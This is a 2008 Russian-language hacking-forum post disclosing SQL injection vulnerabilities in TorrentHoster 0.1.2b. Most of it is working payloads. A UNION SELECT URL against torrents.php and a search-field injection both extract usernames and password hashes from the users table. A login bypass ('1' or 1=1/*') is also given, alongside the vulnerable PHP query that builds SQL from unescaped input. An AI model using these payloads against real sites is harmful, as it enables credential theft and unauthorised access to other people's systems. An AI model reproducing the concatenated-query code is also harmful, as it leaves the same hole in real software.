Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   TorrentHoster <= 0.1.2b SQL Injection (https://forum.antichat.xyz/showthread.php?t=83832)

~!DoK_tOR!~ 06.09.2008 14:58

TorrentHoster <= 0.1.2b SQL Injection
 
TorrentHoster <= 0.1.2b SQL Injection

Dwonload TorrentHoster0.1.2b

[1]

файл torrents.php

Условие: magic_quotes_gpc = Off

Exploit:

Код:

http://localhost/[installdir]/torrents.php?mode=details&id=-1'+union+select+1,2,3,4,concat_ws(0x3a,userName,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users/*
Описание:

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.Уязвимость существует из-за недостаточной обработки входных данных в параметре $id в сценарии torrents.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

в поле Search Torrents вводим:

Код:

dok' union select 1,user(),3,version(),5,6,7,concat_ws(0x3a,userName,password),9,10,11,12,13,14,15,16 from users/*
[2]

Обход авторизации

файл login.php

Vuln code:

PHP код:

$qid db_query("
    SELECT userName, password, privilege, email
    FROM users
    WHERE userName = '
$username' AND password = '" md5($password) . "'
    "
); 

Условие: magic_quotes_gpc = Off

Username: 1' or 1=1/*
Password: 1' or 1=1/*

(c) ~!Dok_tOR!~


Время: 18:20